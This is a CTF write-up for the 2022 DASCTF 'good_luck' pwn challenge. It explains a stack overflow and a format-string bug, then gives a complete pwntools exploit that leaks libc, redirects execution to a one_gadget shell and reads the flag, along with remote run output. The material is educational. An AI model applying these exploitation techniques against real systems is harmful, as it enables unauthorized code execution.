WriteUp: 2022DASCTF Apr X FATE: good_luck

0x0 Checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

0x1 Reverse Enginnering

两处非常明显的漏洞，overflow函数中的stack overflow；fmt函数中的format string attack.

0x2 Analyze

format stirng attack里的字符串输入使用的gets,该函数读到0x0a即(换行符 \n)就会终止，而ROP Gadget中pop rdi;ret的地址中恰好包含0x0a，因此想要使用rop chain调用elf.plt['puts'],输出elf.got['puts']的计划落空。

想要leak libc, 这里还可以通过format string attack。

在leak libc之后，再使用stack overflow 劫持控制流，执行one gadget.

0x3 Exploit Code

#!python3
from os import remove
from pwn import *
from LibcSearcher import *

context.clear(arch='amd64', os='linux')
elf = context.binary = ELF("bin")
libc = elf.libc

context.terminal = ["tmux", "split", "-h"]

if args.LOG:
    context.log_level = 'debug'

gs = '''
set breakpoint pending on
# b *0x40089F
b printf 
continue
'''
# =============================================================================

def start():
    if args.GDB:
        # return gdb.debug(elf.path, gdbscript=gs)
        return process(elf.path)
    elif args.REMOTE:
        #64.27.6.187 8888
        # return remote('64.27.6.187', 8888)
        return remote('39.99.242.16', 10000)
    else:
        return process(elf.path)

sla = lambda a, b: io.sendlineafter(a, b)
sa = lambda a, b: io.sendafter(a, b)
rl = lambda: p.recvline()

def good_start():
    while(True):
        io = start()
        io.recvuntil(b'>>\ngood luck\n')
        ctn = io.recvline()
        if ctn == b"luck!\n":
            return io
        else:
            io.close()
            continue
        
    return io
# =============================================================================

rop_rdi_ret = 0x400a23  # pop rdi ; ret
rop_rsi_r15_ret = 0x400a21 # pop rsi ; pop r15 ; ret
rop_ret = 0x40028e # ret

io = good_start()
if args.GDB:
    gdb.attach(io, gdbscript=gs)

io.timeout = 3000 

payload = b'a'*80 + p64(0xbeadbeef) #ebp

# payload += p64(rop_ret)
payload += p64(elf.sym.fmt)  #+ p64(rop_ret)
payload += p64(elf.sym.overflow)*2

# payload = b"a"*80 + p64(0xbeadbeef) + p64(0xbeadbeef)

io.sendline(payload)

io.recvuntil(b"fmt\n")
payload = b"%7$s".ljust(8, b'a') + p64(elf.got['puts'])
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('puts_addr: ' + hex(puts_addr))
# 通过puts_addr到https://libc.blukat.me/查询libc版本

libc.address = puts_addr - libc.sym['puts']

log.success('libc_base: ' + hex(libc.address))

payload = b'a'*80 + p64(0xbeadbeef)
# payload += p64(0x4527a + libc.address)
payload += p64(0x45226 + libc.address)


# payload = b'a'*80 + p64(0xbeadbeef) + p64(0xbeadbeef)
io.recvuntil(b"luck!\n")
io.sendline(payload)
# =============================================================================
io.sendline(b'cat flag.txt')
io.recvuntil(b'luck!\n')
flag = io.recvline()
log.success('flag: {}'.format(flag))

# io.interactive()
io.close()

0x4 Output Example

─$ python xpl.py REMOTE
[*] '2022DASCTF/good_luck/bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fe000)
[*] 'libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[+] puts_addr: 0x7f95247f46a0
[+] libc_base: 0x7f9524785000
[+] flag: b'DASCTF{7312255e-7b8a-4664-9a9f-3f67671452d7}\n'
[*] Closed connection to 39.99.242.16 port 10000

0x5 The Challenge

https://buuoj.cn/match/matches/95/challenges#good_luck